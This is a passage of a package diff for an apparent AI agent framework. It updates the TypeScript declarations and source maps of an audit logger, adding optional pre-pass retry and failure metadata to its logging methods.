,iBAAiB,CAAC,CAAC;IACvC;gEAC4D;IAC5D,OAAO,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,CAAC,EAAE,CAAC;IACrB,oBAAoB;AACtB,CAAC;AAED;;;;;;;GAOG;AACH,MAAM,UAAU,mBAAmB,CAAC,GAAW;IAC7C,qEAAqE;IACrE,mEAAmE;IACnE,MAAM,CAAC,GAAG,GAAG,CAAC,OAAO,CAAC,cAAc,EAAE,EAAE,CAAC,CAAC;IAC1C,MAAM,QAAQ,GAAa;QACzB,qBAAqB;QACrB,yCAAyC;QACzC,aAAa;QACb,eAAe;QACf,aAAa;QACb,wBAAwB;QACxB,2BAA2B;QAC3B,UAAU;QACV,0BAA0B;QAC1B,gCAAgC;QAChC,0DAA0D;KAC3D,CAAC;IACF,OAAO,QAAQ,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,EAAE,CAAC,CAAC,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC,CAAC;AACzC,CAAC;AAED,SAAS,UAAU,CAAC,GAAW;IAC7B,+DAA+D;IAC/D,MAAM,CAAC,GAAG,GAAG,CAAC,OAAO,CAAC,cAAc,EAAE,EAAE,CAAC,CAAC;IAC1C,MAAM,IAAI,GAAG,CAAC,CAAC,KAAK,CAAC,GAAG,CAAC,CAAC;IAC1B;;yBAEqB;IACrB,MAAM,IAAI,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,GAAG,CAAC,CAAC,IAAI,EAAE,CAAC;IACzC,OAAO,IAAI,CAAC,MAAM,GAAG,CAAC,CAAC,CAAC,CAAC,OAAO,IAAI,EAAE,CAAC,CAAC,CAAC,WAAW,CAAC;IACrD,oBAAoB;AACtB,CAAC"}

package/dist/safety/audit.d.ts

@@ -1,5 +1,5 @@
 import type Database from "better-sqlite3";
-import type { Event, AgentResult, MessageEvent } from "@aitne/shared";
+import type { AgentResult, BackendId, Event, IntegrationKey, MessageEvent } from "@aitne/shared";
 import type { BangCommandDetail, IAuditLogger } from "../core/dispatcher.js";
 export interface AuditEventRow {
     id: number;
@@ -33,6 +33,8 @@ export declare class AuditLogger implements IAuditLogger {
     private readonly hasCostSourceColumn;
     private readonly hasContextUpdatedColumn;
     private readonly hasAdvisorCallCountColumn;
+    private readonly hasSourceKindColumn;
+    private readonly hasSourceRefColumn;
     constructor(db: Database.Database, options?: AuditLoggerOptions);
     logAction(params: {
         event: Event;
@@ -61,6 +63,23 @@ export declare class AuditLogger implements IAuditLogger {
             refetchedToday: boolean;
             triggerMatched: boolean;
         };
+        prePass?: {
+            parentCorrelationId: string;
+            parentRoutine: string;
+            integrationKey: IntegrationKey;
+            attempt: number;
+            maxAttempts: number;
+            retriedFromAttempt: number | null;
+            status: "success" | "partial" | "failed" | "skipped";
+            fetched: number;
+            posted: number;
+            duplicates: number;
+            errors: ReadonlyArray<Record<string, unknown>>;
+            willRetry: boolean;
+            retryReason: string;
+            fallbackTriggered?: boolean;
+            requestedBackend?: BackendId;
+        };
     }): void;
     logSkip(event: Event, reason: string, trigger: "reactive" | "autonomous"): void;
     /**
@@ -104,6 +123,32 @@ export declare class AuditLogger implements IAuditLogger {
         modelId?: string;
         failureKind?: string;
         failureCode?: string;
+        /**
+         * Pre-pass fan-out failure block. Mirrors the `prePass` payload on
+         * `logAction` so `MetricsCollector.collectPrePassMetrics` can see
+         * every failure mode (binding-resolve, global-budget-cap,
+         * per-integration budget-cap, context-build, agent-execute) without
+         * a parallel `result='success'` row. The aggregator filters by
+         * `detail.prePass` being a non-null object — independent of
+         * `result`, so writing it here is sufficient.
+         */
+        prePass?: {
+            parentCorrelationId: string;
+            parentRoutine: string;
+            integrationKey: IntegrationKey;
+            attempt: number;
+            maxAttempts: number;
+            retriedFromAttempt: number | null;
+            status: "success" | "partial" | "failed" | "skipped";
+            fetched: number;
+            posted: number;
+            duplicates: number;
+            errors: ReadonlyArray<Record<string, unknown>>;
+            willRetry: boolean;
+            retryReason: string;
+            fallbackTriggered?: boolean;
+            requestedBackend?: BackendId;
+        };
     }): void;
     private emitInsertedRow;
 }

package/dist/safety/audit.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"audit.d.ts","sourceRoot":"","sources":["../../src/safety/audit.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"audit.d.ts","sourceRoot":"","sources":["../../src/safety/audit.ts"],"names":[],"mappings":"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"}